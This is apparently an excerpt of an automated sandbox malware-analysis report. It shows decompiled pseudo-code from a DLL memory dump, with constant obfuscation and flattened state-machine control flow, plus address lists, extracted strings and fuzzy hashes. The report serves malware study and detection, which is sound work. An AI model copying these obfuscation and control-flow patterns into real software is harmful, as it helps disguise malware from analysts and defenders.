				_t325 = 0x3c;
				_v108 = _v108 / _t325;
				_v108 = _v108 ^ 0x00007739;
				_v36 = 0xe688;
				_v36 = _v36 * 0x7c;
				_v36 = _v36 ^ 0x006ff120;
				_v64 = 0x8973;
				_v64 = _v64 * 0x78;
				_v64 = _v64 + 0xffffe5f3;
				_v64 = _v64 ^ 0x00403b10;
				_v84 = 0xb898;
				_v84 = _v84 | 0xd7ba54c8;
				_v84 = _v84 << 9;
				_v84 = _v84 * 0x61;
				_v84 = _v84 ^ 0xb39b8a6a;
				_v60 = 0xbf93;
				_v60 = _v60 * 0x6d;
				_t326 = 0x77;
				_v60 = _v60 / _t326;
				_v60 = _v60 ^ 0x0000fa47;
				_v68 = 0xaf55;
				_v68 = _v68 << 0xc;
				_v68 = _v68 ^ 0x2dc9c78d;
				_v68 = _v68 ^ 0x273cd649;
				_v52 = 0x7efa;
				_v52 = _v52 >> 7;
				_v52 = _v52 ^ 0x0000764c;
				_v72 = 0x6089;
				_v72 = _v72 + 0x2a2b;
				_v72 = _v72 | 0x3904f943;
				_v72 = _v72 ^ 0x3904851d;
				_v20 = 0xa1cc;
				_v20 = _v20 >> 0xe;
				_v20 = _v20 ^ 0x000007cd;
				_v124 = 0xe641;
				_t327 = 0x3d;
				_v124 = _v124 / _t327;
				_v124 = _v124 + 0xffff7dc6;
				_v124 = _v124 + 0x99df;
				_v124 = _v124 ^ 0x000058ea;
				_v32 = 0x3f90;
				_v32 = _v32 ^ 0x93f3341d;
				_v32 = _v32 ^ 0x93f350c1;
				_v120 = 0xe6fd;
				_v120 = _v120 | 0x255a92ed;
				_t328 = 0x4d;
				_v120 = _v120 * 0x7c;
				_v120 = _v120 + 0xfaca;
				_v120 = _v120 ^ 0x1810a243;
				_v128 = 0x2240;
				_v128 = _v128 + 0x7931;
				_v128 = _v128 / _t328;
				_v128 = _v128 << 8;
				_v128 = _v128 ^ 0x00025b5b;
				_v40 = 0x8329;
				_v40 = _v40 << 8;
				_v40 = _v40 ^ 0x008373f8;
				_v132 = 0x3141;
				_v132 = _v132 + 0xffffa947;
				_v132 = _v132 + 0x9fdd;
				_t329 = 0x6a;
				_v132 = _v132 * 0x48;
				_v132 = _v132 ^ 0x00221e01;
				_v48 = 0x9387;
				_v48 = _v48 + 0x63e0;
				_v48 = _v48 ^ 0x0000dde8;
				_v92 = 0xe4d7;
				_v92 = _v92 * 0x55;
				_v92 = _v92 >> 4;
				_v92 = _v92 + 0x2689;
				_v92 = _v92 ^ 0x0004a833;
				_v28 = 0x7029;
				_v28 = _v28 >> 0xe;
				_v28 = _v28 ^ 0x00007b84;
				_v76 = 0x6bcf;
				_v76 = _v76 | 0x72c32910;
				_t305 = _v76;
				_t355 = _t305 % _t329;
				_v76 = _t305 / _t329;
				_v76 = _v76 ^ 0x01155b12;
				_v80 = 0x13c7;
				_v80 = _v80 ^ 0xb7ed540d;
				_v80 = _v80 ^ 0xe457c44d;
				_v80 = _v80 | 0xf3746b99;
				_v80 = _v80 ^ 0xf3fe8e69;
				_v24 = 0x179a;
				_v24 = _v24 >> 6;
				_v24 = _v24 ^ 0x00003eff;
				_v88 = 0x9a39;
				_v88 = _v88 + 0x8972;
				_v88 = _v88 << 0xa;
				_v88 = _v88 >> 3;
				_v88 = _v88 ^ 0x0091d829;
				_v96 = 0xdf1e;
				_v96 = _v96 >> 5;
				_v96 = _v96 ^ 0xcae6c57f;
				_v96 = _v96 << 0xd;
				_v96 = _v96 ^ 0xd870888b;
				while(1) {
					L1:
					while(1) {
						L2:
						_t330 = 0x54a0696;
						do {
							L3:
							while(_t359 != 0x8a78c3) {
								if(_t359 == _t330) {
									_t355 = _v32;
									_t312 = E1000366D(_v32, _v120, _t330, _t358, _v128, _v40, _t330, _v132, _v48, _t330, E1001E4E1);
									_t363 =  &(_t363[0xa]);
									 *(_t358 + 0x30) = _t312;
									__eflags = _t312;
									_t313 = 0x3363496a;
									_t359 =  !=  ? 0x3363496a : 0x31c62d8b;
									L2:
									_t330 = 0x54a0696;
									continue;
								}
								if(_t359 == 0xfb5cd16) {
									_push(_t330);
									_t355 = _v44;
									_t314 = E1001C92D(_v56, _v44, __eflags, _v116, _v100, _t362);
									_t363 =  &(_t363[4]);
									 *(_t358 + 0x18) = _t314;
									__eflags = _t314;
									if(__eflags == 0) {
										L12:
										_t359 = 0x1861f777;
										while(1) {
											L1:
											goto L2;
										}
									}
									E10008DE6(_v36,  *(_t358 + 0x18), _v64,  *(_t358 + 0x18), _v84);
									_t355 =  *(_t358 + 0x18);
									E1000447F( *(_t358 + 0x18), _v68, _v52, _v72);
									_t363 =  &(_t363[7]);
									_t359 = 0x207dc5f4;
									while(1) {
										L1:
										goto L2;
									}
								}
								if(_t359 == 0x1861f777) {
									return E100033F4(_v80, _v24, _v88, _v96, _t358);
								}
								if(_t359 == 0x207dc5f4) {
									_t355 =  *(_t358 + 0x18);
									_t318 = E1001178A(_v20,  *(_t358 + 0x18), _v124);
									_t363 =  &(_t363[1]);
									 *(_t358 + 4) = _t318;
									__eflags = _t318;
									_t330 = 0x54a0696;
									_t313 = 0x3363496a;
									_t359 =  !=  ? 0x54a0696 : 0x31c62d8b;
									continue;
								}
								if(_t359 == 0x31c62d8b) {
									_t355 = _v28;
									E1001EEC8(_v92, _v28, _v76,  *(_t358 + 0x18));
									goto L12;
								}
								if(_t359 != _t313) {
									goto L20;
								}
								 *((intOrPtr*)(_t358 + 0x34)) = _t321;
								_t320 =  *0x1002140c; // 0x0
								 *(_t358 + 0x2c) = _t320;
								 *0x1002140c = _t358;
								return _t320;
							}
							_push(_t330);
							_t331 = 0x3c;
							_t358 = E1000A0AD(_t331, _t355);
							__eflags = _t358;
							if(__eflags == 0) {
								_t359 = 0x2aaab694;
								_t330 = 0x54a0696;
								goto L20;
							}
							_t359 = 0xfb5cd16;
							goto L1;
							L20:
							__eflags = _t359 - 0x2aaab694;
						} while (__eflags != 0);
						return _t313;
					}
				}
			}

0x1001c1c2
0x1001c1c8
0x1001c1d0
0x1001c1dc
0x1001c1de
0x1001c1e0
0x1001c1e9
0x1001c1f0
0x1001c1f2
0x1001c1fa
0x1001c1ff
0x1001c20b
0x1001c20e
0x1001c212
0x1001c217
0x1001c21f
0x1001c227
0x1001c22f
0x1001c237
0x1001c23f
0x1001c247
0x1001c24f
0x1001c257
0x1001c25f
0x1001c267
0x1001c26f
0x1001c277
0x1001c27f
0x1001c287
0x1001c294
0x1001c298
0x1001c2a0
0x1001c2ad
0x1001c2b0
0x1001c2b4
0x1001c2c1
0x1001c2c5
0x1001c2cd
0x1001c2d5
0x1001c2e2
0x1001c2ea
0x1001c2ed
0x1001c2f1
0x1001c2f9
0x1001c306
0x1001c30a
0x1001c312
0x1001c31f
0x1001c323
0x1001c32b
0x1001c333
0x1001c33b
0x1001c343
0x1001c34d
0x1001c351
0x1001c359
0x1001c368
0x1001c372
0x1001c377
0x1001c37d
0x1001c385
0x1001c38d
0x1001c392
0x1001c39a
0x1001c3a2
0x1001c3aa
0x1001c3af
0x1001c3b7
0x1001c3bf
0x1001c3c7
0x1001c3cf
0x1001c3d7
0x1001c3e2
0x1001c3ea
0x1001c3f5
0x1001c401
0x1001c406
0x1001c40c
0x1001c414
0x1001c41c
0x1001c424
0x1001c42c
0x1001c434
0x1001c43c
0x1001c444
0x1001c451
0x1001c454
0x1001c458
0x1001c460
0x1001c468
0x1001c470
0x1001c480
0x1001c484
0x1001c489
0x1001c491
0x1001c499
0x1001c49e
0x1001c4a6
0x1001c4ae
0x1001c4b6
0x1001c4c3
0x1001c4c4
0x1001c4c8
0x1001c4d0
0x1001c4d8
0x1001c4e0
0x1001c4e8
0x1001c4f5
0x1001c4f9
0x1001c4fe
0x1001c506
0x1001c50e
0x1001c516
0x1001c51b
0x1001c523
0x1001c52b
0x1001c533
0x1001c537
0x1001c539
0x1001c53d
0x1001c545
0x1001c54d
0x1001c555
0x1001c55d
0x1001c565
0x1001c56d
0x1001c575
0x1001c57a
0x1001c582
0x1001c58a
0x1001c592
0x1001c597
0x1001c59c
0x1001c5a4
0x1001c5ac
0x1001c5b1
0x1001c5b9
0x1001c5be
0x1001c5c6
0x1001c5c6
0x1001c5cb
0x1001c5cb
0x1001c5cb
0x1001c5d0
0x00000000
0x1001c5d0
0x1001c5de
0x1001c700
0x1001c707
0x1001c70c
0x1001c70f
0x1001c712
0x1001c719
0x1001c71e
0x1001c5cb
0x1001c5cb
0x00000000
0x1001c5cb
0x1001c5ea
0x1001c67f
0x1001c689
0x1001c691
0x1001c696
0x1001c699
0x1001c69c
0x1001c69e
0x1001c643
0x1001c643
0x1001c5c6
0x1001c5c6
0x00000000
0x1001c5c6
0x1001c5c6
0x1001c6b6
0x1001c6c7
0x1001c6ce
0x1001c6d3
0x1001c6d6
0x1001c5c6
0x1001c5c6
0x00000000
0x1001c5c6
0x1001c5c6
0x1001c5f6
0x00000000
0x1001c77e
0x1001c602
0x1001c651
0x1001c65b
0x1001c660
0x1001c663
0x1001c666
0x1001c66d
0x1001c672
0x1001c677
0x00000000
0x1001c677
0x1001c60a
0x1001c631
0x1001c63c
0x00000000
0x1001c642
0x1001c60e
0x00000000
0x00000000
0x1001c614
0x1001c617
0x1001c61c
0x1001c61f
0x00000000
0x1001c61f
0x1001c72e
0x1001c731
0x1001c737
0x1001c73a
0x1001c73c
0x1001c748
0x1001c752
0x00000000
0x1001c752
0x1001c73e
0x00000000
0x1001c757
0x1001c757
0x1001c757
0x00000000
0x1001c5d0
0x1001c5cb

Strings

X, xrefs: 1001C41C
$u, xrefs: 1001C247
A1, xrefs: 1001C4A6
jIc3, xrefs: 1001C719
)p, xrefs: 1001C50E
+*, xrefs: 1001C3BF
9w, xrefs: 1001C2F1
jIc3, xrefs: 1001C672
z;, xrefs: 1001C2A0
c, xrefs: 1001C4D8
jIc3, xrefs: 1001C5C6
jIc3, xrefs: 1001C74D
1y, xrefs: 1001C470

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: $u$)p$+*$1y$9w$A1$jIc3$jIc3$jIc3$jIc3$z;$X$c
API String ID: 0-3357977862
Opcode ID: 0a63bc1393fb1317766884fd4e2015a999a15cab4305f766ebbd830946c4c99f
Instruction ID: 2c2c505007f30e15865fb936debdd36c960949786fa076a9256da92103e2a81b
Opcode Fuzzy Hash: 0a63bc1393fb1317766884fd4e2015a999a15cab4305f766ebbd830946c4c99f
Instruction Fuzzy Hash: 65E152719097819FE358CF25C48940BFBE1FBC4788F10891DF5999A2A0D7B9D949CF42

Uniqueness

Uniqueness Score: -1.00%

Function 10002C93, Relevance: 15.3, Strings: 12, Instructions: 315
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E10002C93() {
				char _v524;
				signed int _v528;
				signed int _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				signed int _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				char _v580;
				intOrPtr _v584;
				char _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				signed int _v688;
				signed int _v692;
				signed int _v696;
				signed int _v700;
				signed int _v704;
				signed int _v708;
				signed int _v712;
				signed int _v716;
				signed int _v720;
				intOrPtr _t335;
				void* _t337;
				signed int _t342;
				void* _t345;
				intOrPtr _t346;
				intOrPtr _t348;
				void* _t353;
				void* _t354;
				char _t355;
				signed int _t388;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				void* _t397;
				void* _t401;

				_v532 = _v532 & 0x00000000;
				_v528 = _v528 & 0x00000000;
				_t354 = 0x9b2ce5a;
				_v540 = 0x347e28;
				_v536 = 0x7aeee;
				_v704 = 0xaac4;
				_v704 = _v704 | 0xf14eabcd;
				_v704 = _v704 << 2;
				_v704 = _v704 + 0xffffcb2d;
				_v704 = _v704 ^ 0xc53a7a60;
				_v712 = 0x42c6;
				_v712 = _v712 | 0x6532b3a6;
				_v712 = _v712 + 0x57c5;
				_v712 = _v712 ^ 0xca7387b4;
				_v712 = _v712 ^ 0xaf40cd1f;
				_v692 = 0xf22b;
				_v692 = _v692 + 0x523b;
				_v692 = _v692 | 0xbf9e3863;
				_v692 = _v692 ^ 0xbf9f4c83;
				_v696 = 0x7d5d;
				_v696 = _v696 + 0xffff113e;
				_v696 = _v696 | 0xb932b712;
				_t388 = 0xe;
				_v696 = _v696 / _t388;
				_v696 = _v696 ^ 0x1249777f;
				_t353 = 0;
				_v648 = 0xc976;
				_v648 = _v648 + 0xab1f;
				_v648 = _v648 + 0xffffb7a4;
				_v648 = _v648 ^ 0x000173cc;
				_v596 = 0x6fff;
				_t389 = 0x2c;
				_v596 = _v596 / _t389;
				_v596 = _v596 ^ 0x00004c5d;
				_v608 = 0x6eb1;
				_v608 = _v608 | 0x0ee9eb86;
				_v608 = _v608 ^ 0x0ee9e8c6;
				_v700 = 0x1181;
				_v700 = _v700 ^ 0x81951b87;
				_t390 = 0x7b;
				_v700 = _v700 / _t390;
				_v700 = _v700 ^ 0x8c2ceb3d;
				_v700 = _v700 ^ 0x8d215883;
				_v716 = 0x5cc4;
				_v716 = _v716 << 2;
				_v716 = _v716 >> 0xf;
				_v716 = _v716 >> 5;
				_v716 = _v716 ^ 0x00005821;
				_v620 = 0x6341;
				_v620 = _v620 << 6;
				_v620 = _v620 ^ 0x0018dd6c;
				_v636 = 0xb40f;
				_v636 = _v636 ^ 0x5c3bdec7;
				_v636 = _v636 + 0xffff6f03;
				_v636 = _v636 ^ 0x5c3aaac3;
				_v684 = 0x3239;
				_t391 = 0x34;
				_v684 = _v684 / _t391;
				_v684 = _v684 + 0xffff44db;
				_v684 = _v684 ^ 0xffff141b;
				_v672 = 0xe890;
				_v672 = _v672 | 0xf8d4cebd;
				_t392 = 0x23;
				_v672 = _v672 / _t392;
				_v672 = _v672 ^ 0x071c0aaf;
				_v612 = 0xe7a3;
				_v612 = _v612 << 0xb;
				_v612 = _v612 ^ 0x073d13bb;
				_v708 = 0x5392;
				_t393 = 0x24;
				_v708 = _v708 / _t393;
				_v708 = _v708 >> 2;
				_t394 = 0x45;
				_v708 = _v708 * 0x28;
				_v708 = _v708 ^ 0x00000deb;
				_v720 = 0x46fa;
				_v720 = _v720 / _t394;
				_v720 = _v720 + 0x68df;
				_v720 = _v720 + 0xffff2cbd;
				_v720 = _v720 ^ 0xffffdfbf;
				_v664 = 0xe4d1;
				_v664 = _v664 >> 5;
				_t395 = 0x71;
				_v664 = _v664 * 0x29;
				_v664 = _v664 ^ 0x00013ca3;
				_v628 = 0xd290;
				_v628 = _v628 >> 0xf;
				_v628 = _v628 | 0x844972b7;
				_v628 = _v628 ^ 0x84492151;
				_v676 = 0x4e54;
				_v676 = _v676 + 0xffff1dd2;
				_v676 = _v676 ^ 0xbba0e889;
				_v676 = _v676 ^ 0x445fcf9c;
				_v640 = 0x4e8c;
				_v640 = _v640 | 0xeee2c2d9;
				_v640 = _v640 + 0xffffae39;
				_v640 = _v640 ^ 0xeee215b8;
				_v656 = 0x9a40;
				_v656 = _v656 | 0xdb7fdaee;
				_v656 = _v656 ^ 0xdb7fd47a;
				_v632 = 0x4b31;
				_v632 = _v632 ^ 0xec29b1d0;
				_v632 = _v632 << 4;
				_v632 = _v632 ^ 0xc29fbe2a;
				_v668 = 0x7fe;
				_v668 = _v668 << 4;
				_v668 = _v668 | 0x8a64fc88;
				_v668 = _v668 ^ 0x8a64e9b7;
				_v604 = 0x94c4;
				_v604 = _v604 + 0xffff7fb4;
				_v604 = _v604 ^ 0x00003d93;
				_v600 = 0xbc1d;
				_v600 = _v600 >> 2;
				_v600 = _v600 ^ 0x00002573;
				_v624 = 0x6a05;
				_v624 = _v624 + 0xd595;
				_v624 = _v624 ^ 0x000124b5;
				_v652 = 0x3787;
				_v652 = _v652 / _t395;
				_v652 = _v652 + 0x6569;
				_v652 = _v652 ^ 0x00002c51;
				_v660 = 0x46df;
				_v660 = _v660 * 0x41;
				_v660 = _v660 + 0xffff4553;
				_v660 = _v660 ^ 0x00116c01;
				_t397 = 1;
				_v680 = 0xfcce;
				_t387 = _v624;
				_v680 = _v680 * 0x2d;
				_v680 = _v680 ^ 0x41899f24;
				_v680 = _v680 ^ 0x41a5ae03;
				_v688 = 0x707;
				_v688 = _v688 ^ 0x0ad73aeb;
				_v688 = _v688 << 1;
				_v688 = _v688 ^ 0x15ae0744;
				_v644 = 0xa14f;
				_v644 = _v644 << 0xd;
				_v644 = _v644 + 0xffffd18f;
				_v644 = _v644 ^ 0x1429b675;
				_v616 = 0x2c0f;
				_v616 = _v616 + 0x1cec;
				_v616 = _v616 ^ 0x000048fb;
				_v592 = 0x48a6;
				_v592 = _v592 >> 0xd;
				_v592 = _v592 ^ 1;
				do {
					while(_t354 != 0x460d5c5) {
						if(_t354 == 0x47cb6f5) {
							E1001D7CE(_v692, _v696, _v648,  &_v588, _v596);
							_t401 = _t401 + 0xc;
							_t354 = 0xa1aa8ee;
							continue;
						} else {
							if(_t354 == 0x9b2ce5a) {
								_t354 = 0x47cb6f5;
								continue;
							} else {
								if(_t354 == 0xa1aa8ee) {
									_v588 = _v588 - E100172DA(_t354);
									_t354 = 0x331728aa;
									asm("sbb [esp+0x9c], edx");
									continue;
								} else {
									if(_t354 == 0xf4ded4a) {
										_t342 = E100139A2(_v640, _v656, _v704, _v632, 0, _v712, _v592, _t354, _v668, _v604, _t354,  &_v524, _v600);
										_t387 = _t342;
										_t401 = _t401 + 0x2c;
										__eflags = _t342 - 0xffffffff;
										if(__eflags != 0) {
											_t354 = 0x460d5c5;
											continue;
										}
									} else {
										if(_t354 == 0x32dcb947) {
											E1000ADFC(_v680, _v688, _t387, _v644);
										} else {
											_t410 = _t354 - 0x331728aa;
											if(_t354 != 0x331728aa) {
												goto L15;
											} else {
												_push(_v620);
												_push(_v716);
												_push(_v700);
												_t345 = E1000B871(0x10001574, _v608, _t410);
												_t346 =  *0x10021fd8; // 0x0
												_t348 =  *0x10021fd8; // 0x0
												E1000487B(_v684, _t410, 0x10001574, _v672, _v612, _t345,  &_v524, _t348 + 0x1c, _v708, _t346 + 0x22c);
												E1000717B(_v720, _v664, _v628, _t345, _v676);
												_t401 = _t401 + 0x38;
												_t354 = 0xf4ded4a;
												_t397 = 1;
												continue;
											}
										}
									}
								}
							}
						}
						L18:
						return _t353;
					}
					_t355 = _v588;
					_t335 = _v584;
					_push(_t355);
					_v576 = _t335;
					_v568 = _t335;
					_v560 = _t335;
					_v552 = _t335;
					_v580 = _t355;
					_v572 = _t355;
					_v564 = _t355;
					_v556 = _t355;
					_v548 = _v616;
					_t337 = E10010665( &_v580, _v624, _v652, _v660, _t387);
					_t401 = _t401 + 0x14;
					_t354 = 0x32dcb947;
					__eflags = _t337;
					_t353 =  !=  ? _t397 : _t353;
					L15:
					__eflags = _t354 - 0x23703e31;
				} while (__eflags != 0);
				goto L18;
			}

0x10002c9d
0x10002ca7
0x10002caf
0x10002cb4
0x10002cbf
0x10002cca
0x10002cd2
0x10002cda
0x10002cdf
0x10002ce7
0x10002cef
0x10002cf7
0x10002cff
0x10002d07
0x10002d0f
0x10002d17
0x10002d1f
0x10002d27
0x10002d2f
0x10002d37
0x10002d3f
0x10002d47
0x10002d55
0x10002d5a
0x10002d60
0x10002d68
0x10002d6a
0x10002d72
0x10002d7a
0x10002d82
0x10002d8a
0x10002d9c
0x10002da1
0x10002daa
0x10002db5
0x10002dc0
0x10002dcb
0x10002dd6
0x10002dde
0x10002dea
0x10002def
0x10002df5
0x10002dfd
0x10002e05
0x10002e0d
0x10002e12
0x10002e17
0x10002e1c
0x10002e24
0x10002e2c
0x10002e31
0x10002e39
0x10002e41
0x10002e49
0x10002e51
0x10002e59
0x10002e65
0x10002e68
0x10002e6c
0x10002e74
0x10002e7c
0x10002e84
0x10002e94
0x10002e99
0x10002e9f
0x10002ea7
0x10002eb2
0x10002eba
0x10002ec5
0x10002ed1
0x10002ed6
0x10002edc
0x10002ee6
0x10002ee9
0x10002eed
0x10002ef5
0x10002f05
0x10002f09
0x10002f11
0x10002f19
0x10002f21
0x10002f29
0x10002f33
0x10002f34
0x10002f38
0x10002f40
0x10002f48
0x10002f4d
0x10002f55
0x10002f5d
0x10002f65
0x10002f6d
0x10002f75
0x10002f7d
0x10002f85
0x10002f8d
0x10002f95
0x10002f9d
0x10002fa5
0x10002fad
0x10002fb5
0x10002fbd
0x10002fc5
0x10002fca
0x10002fd2
0x10002fda
0x10002fdf
0x10002fe7
0x10002fef
0x10002ffa
0x10003005
0x10003010
0x1000301b
0x10003023
0x1000302e
0x10003036
0x1000303e
0x10003046
0x10003054
0x10003058
0x10003060
0x10003068
0x10003075
0x10003079
0x10003083
0x1000308b
0x1000308c
0x1000309e
0x100030a2
0x100030a6
0x100030ae
0x100030b6
0x100030be
0x100030c6
0x100030ca
0x100030d2
0x100030da
0x100030df
0x100030e7
0x100030ef
0x100030f7
0x100030ff
0x10003107
0x10003112
0x1000311a
0x10003121
0x10003121
0x1000312f
0x10003297
0x1000329c
0x1000329f
0x00000000
0x10003135
0x1000313b
0x10003272
0x00000000
0x10003141
0x10003147
0x1000325a
0x10003261
0x10003266
0x00000000
0x1000314d
0x10003153
0x1000323b
0x10003240
0x10003242
0x10003245
0x10003248
0x1000324e
0x00000000
0x1000324e
0x10003159
0x1000315f
0x10003342
0x10003165
0x10003165
0x1000316b
0x00000000
0x10003171
0x10003171
0x1000317a
0x1000317e
0x10003189
0x10003193
0x100031a2
0x100031cb
0x100031e4
0x100031eb
0x100031ee
0x100031f3
0x00000000
0x100031f3
0x1000316b
0x1000315f
0x10003153
0x10003147
0x1000313b
0x1000334c
0x10003355
0x10003355
0x100032a9
0x100032b7
0x100032be
0x100032c0
0x100032c7
0x100032ce
0x100032d5
0x100032e7
0x100032f2
0x10003300
0x10003307
0x1000330e
0x10003315
0x1000331a
0x1000331d
0x10003322
0x10003324
0x10003327
0x10003327
0x10003327
0x00000000

Strings

]L, xrefs: 10002DAA
]}, xrefs: 10002D37
(~4, xrefs: 10002CB4
s%, xrefs: 10003023
Ac, xrefs: 10002E24
1K, xrefs: 10002FB5
92, xrefs: 10002E59
;R, xrefs: 10002D1F
TN, xrefs: 10002F5D
1>p#, xrefs: 10003327
Q,, xrefs: 10003060
!X, xrefs: 10002E1C

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: !X$(~4$1>p#$1K$92$;R$Ac$Q,$TN$]L$]}$s%
API String ID: 0-3070783794
Opcode ID: 34c24e8b0339addaa5a8a3bb8901d284649480ea9fb8b80661244b77af5d1c5d
Instruction ID: 8edbd4549d365444e38cff6147d1eac72b46e6eca4b4da57ba4ed6685110d595
Opcode Fuzzy Hash: 34c24e8b0339addaa5a8a3bb8901d284649480ea9fb8b80661244b77af5d1c5d
Instruction Fuzzy Hash: 6EF123715083809FE368CF65C549A4FBBE1FBC4758F10891DF29A862A0D7B49949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 10010082, Relevance: 15.3, Strings: 12, Instructions: 309
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E10010082(intOrPtr __ecx, void* __edx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				void* _t324;
				intOrPtr _t326;
				intOrPtr _t327;
				intOrPtr _t330;
				intOrPtr _t332;
				intOrPtr _t333;
				intOrPtr _t336;
				signed int _t338;
				signed int _t339;
				signed int _t340;
				signed int _t341;
				signed int _t342;
				signed int _t343;
				signed int _t344;
				signed int _t345;
				signed int _t346;
				signed int _t347;
				void* _t352;
				void* _t354;
				intOrPtr _t384;
				void* _t385;
				void* _t388;
				signed int* _t389;

				_t389 =  &_v116;
				_v44 = 0xb274;
				_t388 = __edx;
				_t336 = __ecx;
				_t384 = 0;
				_t338 = 0x1f;
				_v44 = _v44 / _t338;
				_t385 = 0x14151e4e;
				_t339 = 0x60;
				_v44 = _v44 * 0x50;
				_v44 = _v44 ^ 0x0001e6b3;
				_v80 = 0xcc48;
				_v80 = _v80 | 0xf93ad1ed;
				_v80 = _v80 / _t339;
				_v80 = _v80 ^ 0xe8973a48;
				_v80 = _v80 ^ 0xea0ffd3e;
				_v56 = 0x20bb;
				_t340 = 0x2d;
				_v56 = _v56 * 0x39;
				_v56 = _v56 >> 7;
				_v56 = _v56 ^ 0x0000344b;
				_v116 = 0xf36f;
				_v116 = _v116 ^ 0xf46ad42a;
				_v116 = _v116 >> 0xb;
				_v116 = _v116 / _t340;
				_v116 = _v116 ^ 0x0000f361;
				_v24 = 0xa694;
				_v24 = _v24 + 0x5ae7;
				_v24 = _v24 ^ 0x00011986;
				_v28 = 0x69fd;
				_v28 = _v28 | 0x3d3b5a09;
				_v28 = _v28 ^ 0x3d3b1dc9;
				_v52 = 0xd17b;
				_v52 = _v52 ^ 0x1e69d31f;
				_v52 = _v52 | 0x9ad0bab8;
				_v52 = _v52 ^ 0x9ef9ecfa;
				_v104 = 0xf352;
				_t341 = 3;
				_v104 = _v104 * 0x64;
				_v104 = _v104 / _t341;
				_t342 = 0x58;
				_v104 = _v104 / _t342;
				_v104 = _v104 ^ 0x000026a6;
				_v108 = 0x23fc;
				_v108 = _v108 + 0x5650;
				_v108 = _v108 | 0x012ecb44;
				_v108 = _v108 ^ 0x4b27fa11;
				_v108 = _v108 ^ 0x4a0959d8;
				_v112 = 0x76fe;
				_v112 = _v112 ^ 0x630c8645;
				_v112 = _v112 | 0x53eb135e;
				_v112 = _v112 >> 0xe;
				_v112 = _v112 ^ 0x00019896;
				_v92 = 0x17d5;
				_v92 = _v92 | 0xa4cd7f50;
				_v92 = _v92 ^ 0xf966f90e;
				_v92 = _v92 ^ 0x5791ae06;
				_v92 = _v92 ^ 0x0a3a08b9;
				_v96 = 0xa79;
				_v96 = _v96 ^ 0xa3930f1b;
				_t343 = 0x3c;
				_v96 = _v96 / _t343;
				_v96 = _v96 | 0x0fe85a86;
				_v96 = _v96 ^ 0x0ff9be7d;
				_v48 = 0x673b;
				_v48 = _v48 ^ 0xc4ce93b1;
				_t344 = 0x3b;
				_v48 = _v48 / _t344;
				_v48 = _v48 ^ 0x0355da1a;
				_v100 = 0xf160;
				_t345 = 0xa;
				_v100 = _v100 / _t345;
				_v100 = _v100 + 0xffff23b1;
				_v100 = _v100 + 0xdd89;
				_v100 = _v100 ^ 0x00004c8b;
				_v40 = 0xd120;
				_t346 = 0x70;
				_v40 = _v40 * 0x74;
				_v40 = _v40 << 3;
				_v40 = _v40 ^ 0x02f62e1e;
				_v76 = 0xe950;
				_v76 = _v76 / _t346;
				_v76 = _v76 << 0xb;
				_v76 = _v76 << 0xb;
				_v76 = _v76 ^ 0x854037fd;
				_v8 = 0x6531;
				_v8 = _v8 + 0x1cb7;
				_v8 = _v8 ^ 0x0000d9f9;
				_v12 = 0xbe59;
				_v12 = _v12 ^ 0x85a026f2;
				_v12 = _v12 ^ 0x85a08a21;
				_v16 = 0xddfb;
				_v16 = _v16 ^ 0x77cb6f90;
				_v16 = _v16 ^ 0x77cbfa07;
				_v84 = 0xb22d;
				_v84 = _v84 | 0xcefffd3f;
				_v84 = _v84 >> 1;
				_v84 = _v84 ^ 0x677fd804;
				_v88 = 0x8c14;
				_v88 = _v88 + 0x7944;
				_v88 = _v88 << 7;
				_t347 = 0x6a;
				_v88 = _v88 / _t347;
				_v88 = _v88 ^ 0x00013fcc;
				_v20 = 0x81bf;
				_v20 = _v20 >> 0xa;
				_v20 = _v20 ^ 0x00006a3d;
				_v68 = 0x1a0e;
				_v68 = _v68 | 0x56be6f01;
				_v68 = _v68 << 8;
				_v68 = _v68 + 0xffffac62;
				_v68 = _v68 ^ 0xbe7e82b4;
				_v72 = 0x812b;
				_v72 = _v72 << 5;
				_v72 = _v72 * 0x26;
				_v72 = _v72 ^ 0xa140b703;
				_v72 = _v72 ^ 0xa3253499;
				_v36 = 0x2802;
				_v36 = _v36 ^ 0xac56bc10;
				_v36 = _v36 * 0x41;
				_v36 = _v36 ^ 0xc1fbf735;
				_v4 = 0x746f;
				_v4 = _v4 >> 0xf;
				_v4 = _v4 ^ 0x00005d63;
				_v60 = 0xcf46;
				_v60 = _v60 * 0x4d;
				_v60 = _v60 ^ 0x72dae9f2;
				_v60 = _v60 | 0x3a6a2468;
